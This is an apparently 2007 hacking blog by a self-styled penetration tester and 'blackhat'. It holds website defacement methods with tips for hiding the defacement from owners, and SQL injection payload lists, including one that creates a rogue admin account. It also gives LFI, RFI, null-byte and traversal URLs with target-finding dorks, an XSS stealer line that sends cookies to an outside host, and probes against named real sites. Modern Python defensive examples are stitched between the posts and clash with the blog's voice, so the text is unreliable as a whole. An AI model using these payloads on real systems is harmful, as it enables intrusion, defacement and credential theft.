What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, simulating an organized, professional attack against your organization; afterwards, a detailed report summarizes the weaknesses and the exploited vectors. This will help you gain control over your infrastructure's security and maximize your protection.

Saturday, June 30, 2007

DEFACING SITES [Methods]


Method 1 - Content replacement.

Using the existing server host, web server etc., replace the pages with defaced ones.
- Prerequisite: own the server.
- To undo: delete the defaced pages and restore the original ones.

Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc. to make it marginally harder to change back.

Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, possibly
hidden as a trojan in existing system programs. Ensure that this starts up before
any legitimate web server, thus rendering the original web server useless.

Method 4 - Better web server software replacement.
Destroy or disable the original web server, trojan system programs, and/or make
subtle configuration changes or low-level network changes which cause
defaced web pages to be served one way or another by the machine. Take any other steps
to ensure that it cannot be easily undone.

For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.

Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.

Method 6 - DNS hijacking.
Compromise the DNS. The higher the level, the better. Ideally compromise a top-level DNS and insert
a fake A record at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.

Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).

Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced.

Method 9 - ISP compromise.
Compromise several major ISPs, either by trojanning their install CDs, subverting their routers, or doing several of the above.

Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.

A determined attacker would carry out all the compromises necessary for 1, 2, 4, 5 and 6 ahead of time, set up zombies to serve various pages, and set all the triggers on the same time bomb.

All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.

Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.

Be Protected Methods.

Tips : Be Stealthy
Create IP rules or firewall rules that cause the defacement to be invisible to the site's creators, owners, or maintainers.

Tips : Be Stealthy
Create time-based rules so that the defacement is visible only during times of day when the site's creators, owners etc. are likely to be asleep.

Tips : Be Stealthy
Create IP rules that ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, the Internet Archive etc.

Tips : Be Stealthy
Create user-agent specific rules that make the defacement visible only to users of certain browsers / operating systems. For instance, make the defaced pages visible only to users of Windows 98 or ME, as businesses rarely use these (and sysadmins and web designers never use them).
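The stealth tips above all rely on the owner's own browser never seeing the defaced page, so an integrity check has to compare what different clients receive. The following monitor is an added example, not code from the original post: it hashes normalised page bodies fetched from several vantage points and user agents and reports the fetches that disagree with the owner's view. The fetch results, host names and user agents are constructed sample data; in practice the probes would be scheduled at varying times of day and run from outside the office network.

```python
import hashlib
import re
from collections import defaultdict

def normalize(body: str) -> str:
    """Strip volatile parts (timestamps, whitespace runs) before hashing so
    legitimate dynamic content does not look like a defacement."""
    body = re.sub(r"\d{4}-\d{2}-\d{2}[ T]\d{2}:\d{2}(:\d{2})?", "<ts>", body)
    return re.sub(r"\s+", " ", body).strip()

def fingerprint(body: str) -> str:
    """Short content hash of the normalised page body."""
    return hashlib.sha256(normalize(body).encode("utf-8")).hexdigest()[:16]

def find_split_views(probes, owner_vantage):
    """probes: dicts with keys vantage, user_agent, body (one fetch each).
    Returns sorted (vantage, user_agent) pairs whose content differs from
    every fetch made from the owner's vantage, i.e. candidate selective
    defacements that the owner would never notice from the office."""
    owner_fps = {fingerprint(p["body"]) for p in probes
                 if p["vantage"] == owner_vantage}
    by_view = defaultdict(list)
    for p in probes:
        by_view[fingerprint(p["body"])].append((p["vantage"], p["user_agent"]))
    suspects = [viewer for fp, viewers in by_view.items()
                if fp not in owner_fps for viewer in viewers]
    return sorted(suspects)

# Constructed sample fetches: the office sees the real page; a crawler and an
# old-browser user agent probing from outside receive a replaced page.
REAL = "<html><body><h1>ACME Ltd</h1><p>Welcome. Updated 2007-06-30 10:15</p></body></html>"
FAKE = "<html><body><h1>0wned</h1></body></html>"
SAMPLE_PROBES = [
    {"vantage": "office", "user_agent": "Mozilla/5.0 (Windows NT 5.1) Firefox/2.0", "body": REAL},
    {"vantage": "external-1", "user_agent": "Mozilla/5.0 (Windows NT 5.1) Firefox/2.0",
     "body": REAL.replace("10:15", "10:16")},   # only the timestamp moved: benign
    {"vantage": "external-1", "user_agent": "Googlebot/2.1", "body": FAKE},
    {"vantage": "external-2", "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)",
     "body": FAKE},
]

if __name__ == "__main__":
    for vantage, ua in find_split_views(SAMPLE_PROBES, owner_vantage="office"):
        print(f"content differs from owner's view: {vantage} / {ua}")
```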


/Chuks

Credits to my fellow friend, MuRd3rp0L!c3

Friday, June 22, 2007

AN ATTACK WITH CROSS SITE SCRIPTING

CROSS SITE SCRIPTING ATTACKS


Well, this is a simple example of an XSS-vulnerable site. It displays my cookie when I call document.cookie. If you know what I mean by cookies, then you will understand that you can edit cookies too. Let's explain more on this below. Note: no beef with the site owners, just an example.

For some months I have been studying more on Cross Site Scripting (XSS) and I think I need to post this. I posted a zero-day XSS scanner some time last week; if you didn't get a glimpse of it, I can always do that later.


ABOUT THE SCANNER


Well, that scanner should get you going when looking for targets you want to work on this weekend. Using Google queries
is always the best way to hack with; we always say Google is the best teacher, and the best hack tool ever exposed to the public, that is more than 60% accurate.

I'm not the author of the code; it was done by a good friend. I spend time with Google, so I don't need a code to pick XSS-vulnerable sites.

Anyway, for starters, it's good to know how to use tools before you get all blackhat and start picking targets with Google or mouse pointers, hehehe... I'm Blackhat, I do a lot of underground stuff, read the manifesto, but they will never get near me, since I leave no trace.

THE SCANNING PHOTOS

Let me upload some photos of what the scanners can do.

So we are going to discuss the following:

a) Cookie stealing
b) JavaScript injection
c) XSS in general and how to apply the attack

What Is a Cookie?

A cookie is a sensitive piece of data. Once you go to a site and sign up, a cookie is set to remember you. A cookie just holds data that the site can check to see if you've been there before; if you have, it checks whether the user and password are correct and logs you in. Picture yourself at a night club: you buy a ticket and they give you a wristband, so you can go in and out without having to rebuy a ticket. Cookies go much further than that, as you can see. Night clubs remember you for one night. Cookies can remember you forever.

Alerting & Spoofing

So you know what a cookie is... now how do you see them? Actually cookie editing is one of the most simple methods. As long as you have a browser you can view and edit cookies, just with basic JavaScript (JS) skills. Load up your browser and go to the site... log in... now type javascript:alert(document.cookie) and you should see a user and password (which is yours). If you don't, that's ok! Most sites nowadays don't use cookies... but use sessions... Sorry, sessions can't be edited (they can), but not like cookies; once you edit a cookie you can spoof yourself (username and password). Now let's begin to spoof... Ok, say you alerted the cookie and saw something like this...

strusername=Chuks;strpassword=danger

Now say you know 'kenya' is an admin and you don't know his password... due to weak security you don't need a password: javascript:void(document.cookie="strusername=kenya"). Now type javascript:alert(document.cookie) !!! Heh, welcome kenya. That's pretty much all there is to cookie editing. Do more research on that, I ain't doing it for you.
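The cookie edit above works because the server trusts whatever strusername says. As an added example (not from the original post), here is the weak lookup beside a server-signed cookie: an HMAC over the value, keyed with a secret only the server holds, means a rewritten username no longer verifies. The secret and the user names are constructed for the demo; storing a password in the cookie at all is avoided, only the signed identity is kept.

```python
import hashlib
import hmac

SERVER_SECRET = b"constructed-demo-secret-change-me"   # never sent to the client

def weak_login(cookie: str):
    """The pattern described in the post: believe the username in the cookie."""
    for part in cookie.split(";"):
        key, _, value = part.strip().partition("=")
        if key == "strusername":
            return value
    return None

def make_cookie(username: str, secret: bytes = SERVER_SECRET) -> str:
    """Return 'username.signature'; the signature binds the value to the secret."""
    sig = hmac.new(secret, username.encode("utf-8"), hashlib.sha256).hexdigest()
    return f"{username}.{sig}"

def verify_cookie(cookie: str, secret: bytes = SERVER_SECRET):
    """Return the username if the signature checks out, otherwise None.
    rpartition keeps usernames containing dots intact (the hex digest has none);
    compare_digest avoids leaking the position of a mismatch via timing."""
    username, sep, sig = cookie.rpartition(".")
    if not sep or not username:
        return None
    expected = hmac.new(secret, username.encode("utf-8"), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(expected, sig) else None

if __name__ == "__main__":
    print(weak_login("strusername=kenya;strpassword=danger"))   # accepted, unverified
    signed = make_cookie("Chuks")
    print(verify_cookie(signed))                                # Chuks
    forged = "kenya." + signed.split(".")[1]                    # swap the user, keep the signature
    print(verify_cookie(forged))                                # None
```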

What Is XSS?

XSS, or CSS, whatever you prefer to call it, stands for Cross Site Scripting. Basically that means you inject script of any kind to make it do whatever you want... What you inject determines the outcome. With XSS you can also steal input, such as user names, passwords and cookies. This will all be discussed, as will many examples, and this article should help you get creative with XSS.

With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You set up XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. XSS can also steal cookies. Cookies hold valuable information such as user names, passwords etc.

So there was this question: the output file that the stealer script fills at the evil server with the cookies, could there be a Google dork that can help search for these outputs? Good question, right? Hehehehe...



Cross site scripting seems to be the future of web attacks and new techniques develop every day. Good read. I will edit more later, since this was written in a hurry and I haven't explained more on the attack, so hold on; at least I did an introduction.

/Chuks

Tuesday, June 12, 2007

THE MOST USED METHODS TO PENETRATE A WEBSERVER.


* This tutorial is intended to increase your knowledge of internet security and of penetrating web servers;
* This document was prepared for informational purposes only;
* This document may not be reproduced without the author's permission.

Respects to my friend, flow-flow, for the German paper on the same.


Hackers Manifesto
I am here to exploit, to learn how things work. I've always asked questions and I have always searched for more than two hours. My crime is one of curiosity; I exploit what you dream of. I am over ambition and will. If you want to enter this world, break away, forget all you have learned from the others, the ignorant, those without interest, and learn to do exactly what you want with your knowledge.
I've been in the underground for 5 years, from my first contact with the computer 10 years ago; I was fascinated from the first moment by the infinite possibilities it opens for a man.
You don't know me, so don't judge me! ONLY GOD can judge me!
If you feel something reading these lines, that means that I am talking to you; if not, look away.
We have to help each other; hacking cannot be defined, hacking is a state of mind.
I thank all of you that helped and help me!
This is my manifesto!

The tutorial will be structured in two directions: vulnerabilities and fixing them.

A lot of people make tutorials but they just talk; I am going to really explain a few methods as we go. I don't consider myself a specialist, but I know what I am talking about.

SQL-INJECTION

SQL injection is a method that exploits errors in application code and allows the attacker to inject SQL commands through login forms and feedback forms, with the purpose of obtaining access to sensitive information in the database. SQL injection works because the input forms allow SQL expressions to reach the database directly.
The attacker builds SQL that manipulates the commands sent to the database and so gains access. The most used form is the SQL login bypass, in which we inject in the login and password fields.

Example: ' OR 1=1--
URL scheme: http://site.com/index.php?id=0 ' OR 1=1--
Other commands:
admin'--
' OR 0=0--
" OR 0=0--
OR 0=0--
' HI OR 1=1--
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x

We look for vulnerable sites with the following Google dorks:
"admin\login.asp"
"login.asp"

How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability; the code needs to be bug-free, and the applications and everything that makes up the infrastructure must be sanitized.
At each change of a component, a web security audit must be done.
There is no point in my going into more detail. If you don't have a complex infrastructure to take care of, it isn't worth getting more involved than you already are.

SQL Injection table modification

Here's what we are going to do.
We are going to create an account with special rights. This method involves 3 steps: generating an error that must be understood (it is important to see a certain table name), and after that injecting commands to create a new privileged account.

At the username: ' HAVING 1=1
The error must contain a table name: user_member.id.
Then inject the commands: ' UNION SELECT * FROM user_member WHERE USER_ID='ADMIN' GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try:
' INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE) VALUES('HACKER','HACKED','HCKED',GETDATE());--

Now if everything went well we should be able to log in with:
- user: hacker
- password: hacked
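Both the login bypass and the table-modification trick above depend on the same defect: the form value is pasted into the SQL text, so a quote ends the string and "--" comments out the rest. The example below is added here and is not part of the original tutorial; it runs the first payload from the list against a string-built query and against a parameterized one, using an in-memory SQLite table with constructed rows (SQLite also treats "--" as a comment, so the bypass behaves as described).

```python
import sqlite3

PAYLOAD = "' OR 1=1--"   # the first payload listed in the tutorial

def make_db() -> sqlite3.Connection:
    """Constructed users table: one admin row with a known password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_vulnerable(db, username: str, password: str):
    """Builds the statement by concatenation. The attacker's quote closes the
    username literal, OR 1=1 makes the WHERE clause true for every row, and the
    trailing -- comments out the password check entirely."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username: str, password: str):
    """Placeholders send the values separately from the SQL text, so the payload
    is compared as a literal username string and matches nothing. The same
    separation is what stops the stacked INSERT in the table-modification step."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, "anything"))   # admin
    print(login_safe(db, PAYLOAD, "anything"))         # None
    print(login_safe(db, "admin", "correct-horse"))    # admin
```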

REMOTE FILE INCLUSION

In this method what we actually want to do is upload a file, a shell emulator, onto the vulnerable web page. When the web site calls another page to be displayed we build a URL scheme, upload the emulator and get access to the entire server.
This method is much more than this; this is only one form of it, so read further and more tutorials.
Here is a Google dork to find vulnerable web sites:
inurl:"index.php?page="

We test on: http://site.com/director_vulnerabil.php?=http://google.com ; if Google's page opens inside the site's page, then it is vulnerable.

LOCAL FILE INCLUSION

A code problem can have serious consequences; this method is similar to CGI exploitation. Let's say I have accessed the password file from the UNIX server. Simple; anyone can do this kind of stuff: a scan of a site, a PoC, and then "great hacker". This is lame stuff! Never use a scanner, only if you have to, or if you are interested in a particular thing on the site.
For every vulnerability you have to understand the problem, the code that generates it and so on.
Here is an example of an error:

$page input is not sanitized.

The content is crypted (hashed), but you can try the brute-force method using a program such as Brutus; I will publish a Perl code soon. I searched for passwords of FTP accounts, for instance. It depends on your luck too.

URL scheme used: http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd

REMOTE ADMIN FILE DISCLOSURE

You try this more 'blind' in general, because we don't know for sure if it will work every time.
Remote admin password disclosure: we try to access files from the inside.


URL scheme: http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted a lot of examples on other sites where I found some serious info like passwords and so on. Here it isn't such a big deal.

CROSS SITE SCRIPTING

It is in a state of research and it is the future, some say. I am going to present how you can find this vulnerability and how you can exploit it, but as I said at RFI, you have to study seriously if you want to really understand.
More exactly, I'm going to refer to cookie stealing. For the test you proceed similarly as in SQL injection. You look at forms and you try to inject a simple test script. The result is an alert window with the text "xss"; good, now you know that you can try a more complex script. We will build a cookie stealer and I will show you how you can look for cookies directly from a URL scheme.
After we test it like so: <script>alert('XSS')</script> we do the following:
window.location='http://site.com/carie.php?cookie='+document.cookie;
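The stealer above needs two things from the target: a page that echoes input without escaping, and a session cookie that script can read. As an added example (not from the original tutorial), the helpers below close both on the server side: contextual escaping for element text, quoted attributes and link targets (so a "javascript:" URL in a profile field is dropped), and a Set-Cookie header with HttpOnly so document.cookie never returns the session id. The comment-rendering layout, the field names and the session id are constructed for the demo.

```python
import html
import urllib.parse

# The payload from the tutorial, used here as hostile input to render safely.
STEALER = "<script>window.location='http://site.com/carie.php?cookie='+document.cookie;</script>"

def safe_url(url: str):
    """Allow only http(s) links with a host; anything else (javascript:, data:,
    scheme-less junk) is rejected. urlsplit lower-cases the scheme for us."""
    url = url.strip()
    parts = urllib.parse.urlsplit(url)
    return url if parts.scheme in ("http", "https") and parts.netloc else None

def render_comment(author: str, text: str, homepage: str) -> str:
    """Escape per context: attribute values and element text both go through
    html.escape (quotes included), and the href is scheme-checked first."""
    href = safe_url(homepage) or "#"
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<a href="{html.escape(href, quote=True)}">{html.escape(author)}</a>: '
            f'{html.escape(text)}</div>')

def session_cookie_header(session_id: str) -> str:
    """HttpOnly hides the cookie from document.cookie; Secure and SameSite limit
    where it is sent. The cookie carries an opaque id, never a username or password."""
    return f"Set-Cookie: sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    print(render_comment("kenya", STEALER, "javascript:alert(document.cookie)"))
    print(session_cookie_header("constructed-random-id"))
```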

NULL BYTE-CGI EXPLOITATION

CGI (Common Gateway Interface) is found on web servers and gives control over .cgi and .pl files. CGI scripts and directories are used for statistics, forms and database commands. A NULL byte is used in programming to mark the end of a string. The CGI page accesses other pages like so:
Index.cgi?pageid=2
Here page2.html is shown, but if we modify it a little, like so:
Index.cgi?pageid.cgi%00
we have just added a NULL byte, and it terminates all the data in the URL after it. Now we do the following scheme:
Index.cgi?pageid=/etc/passwd%00

Almost seems like LFI.


DIRECTORY TRAVERSAL

Directory traversal is an HTTP exploit that allows the attacker to access directories inside the server and to execute commands from the server's root.

· Access Control Lists (ACLs)
· Root directory
These are two security mechanisms used on a server. With Access Control Lists the administrator puts limits on users and configures all the other functions. The root directory restriction stops users from accessing files that contain sensitive data, like CMD on the Windows platform and the passwd file on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini
This URL scheme makes a request to the show.asp page on the server and sends the view parameter with the value ../../../../../Windows/system.ini .
Each ../ means we go one directory up.
Another scheme would be: http://site.com/scripts/..%5c../Windows/System32/
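The LFI, null-byte and traversal sections above, and the download.php case, are all one bug: a file parameter that reaches the filesystem without being resolved against the document root. The check below is an added example, not code from the tutorial; it decodes the parameter (twice, so a double-encoded %5c is still caught), refuses NUL bytes, URLs and absolute paths, folds backslashes into slashes, and only then verifies that the normalised path is still under the base directory. The document root and the sample requests are constructed; for a download script the same function is used with the upload directory as base.

```python
import posixpath
import urllib.parse

WEB_ROOT = "/var/www/site/pages"   # constructed document root for the demo

def resolve_include(param: str, base: str = WEB_ROOT):
    """Return the absolute path to serve, or None if the request must be refused."""
    value = urllib.parse.unquote(urllib.parse.unquote(param))   # catches %255c too
    if "\x00" in value:                 # the %00 trick from the CGI section
        return None
    if "://" in value or value.startswith("//"):   # remote include attempt
        return None
    value = value.replace("\\", "/")    # %5c and friends
    if posixpath.isabs(value):          # /etc/passwd and similar
        return None
    candidate = posixpath.normpath(posixpath.join(base, value))
    if posixpath.commonpath([base, candidate]) != base:
        return None                     # ../ climbed out of the document root
    return candidate

# Constructed requests mirroring the URL schemes in the tutorial, with the expected verdict.
SAMPLE_REQUESTS = {
    "about.html": True,
    "news/2007/06.html": True,
    "../../../../../Windows/system.ini": False,
    "..%5c../Windows/System32/": False,
    "..%255c../Windows/System32/": False,
    "/etc/passwd%00": False,
    "http://google.com": False,
}

def all_verdicts_match() -> bool:
    """True when every sample request gets the verdict listed above."""
    return all((resolve_include(req) is not None) == ok
               for req, ok in SAMPLE_REQUESTS.items())

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req!r:40} -> {resolve_include(req)}")
```

Double decoding can mangle a legitimate file name that contains a literal "%25"; if such names exist, decode once and reject any remaining "%" instead.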


Hope this helps all of you; it's an easy intro to web application security.

See u soon,

/Chuks

Thursday, June 07, 2007

PHOTOS FOR THE CEH, FIVE MODULE TRAINING

Well, I had promised I would upload the videos for the conference held a little while ago, but I will have to postpone that to next week. Today I will upload some photos from the classes I trained on CEH. Well, I am not in any of the photos displayed, so don't look for me, hehehehe...


1. One of the students tries to get a glimpse of what is going on when a shell pops up.


2. Some of the students who attended.

That's all for now,

Cheers



/Chuks

Wednesday, June 06, 2007

CHUKSFIRE SQL INJECTION TOOL

I have been busy scripting a tool that can crawl servers looking for vulnerable pages which can be exploited using SQL injection. It's written in Perl and called chuksfire. I will be launching it soon; I will not name the day. I'm still working on the code, but it's at its BETA stage at the moment. I've been busy training, that's why it's not out yet. I will try to probe wananchi.co.ke; I will not display the vulnerable lines, though, but one thing you need to know: SQL injection can get your network compromised. This is how it works:

Starting chuksfire scan...

[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26
[*] Checking robots.txt...
[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...
[*] Checking index.php...
[*] Checking for possible bugs...



I will try to see if I can add some CMS bugs to the code, so as to pick up known SQL injection vulnerabilities in well-used CMSs, like Joomla, XOOPS and others.

Good reading.

/Chuks

HACKERS CODE

The Code

  1. Hackers share and are willing to teach their knowledge.
  2. Hackers are skilled. Many are self-taught, or learn by interacting with other hackers.
  3. Hackers seek knowledge. This knowledge may come from unauthorized or unusual sources, and is often hidden.
  4. Hackers are tinkerers. They like to understand how things work, and want to make their own improvements or modifications.
  5. Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with.
  6. Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another.
  7. Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.
  8. This Code is not to prescribe how hackers act. Instead, it is to help us to recognize our own diversity and identity.
  9. Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals.
  10. Hackers' motivations are their own, and there is no reason for all hackers to agree.
  11. Hackers have a shared identity, however, and many shared interests.
  12. By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.

See you soon in Hack Dejavu, this Saturday for VIP at my security forum/mailing list, the same spot, Igundas Place.

Good day.

/Chuks

Saturday, June 02, 2007

THE IT SECURITY CONFERENCE ARRANGED BY FUTURISTIC

Hi.

As most of you already know, we had the first IT security conference in Kenya in the middle of last month. Though we didn't cover as much as expected, I hope we did a good show, and people got introduced to I.T. security and learned how small holes can be used to compromise the whole server or host.

I'm sure most of you were amazed when I used a tool like Metasploit and got hold of the desktop of someone who was logged in. Actually, hacking with Metasploit and seizing desktops is not so leet; mostly there are more complicated hacking styles, where you install a good connect-back and no one will know you are connected or logged in. For that we use backdoors or rootkits. I demonstrated how to use Remote File Inclusion and how to find it in vulnerable sites, and that's where jaws dropped, since you could browse the victim's system files. "Are we already in someone's server?" you would ask.

Anyway, I hope to meet you at the upcoming CEH full course, which I will personally train, and we will go through the 22 modules.

Hope to see you soon; I will post up at my forum.

Good Read.

/Chuks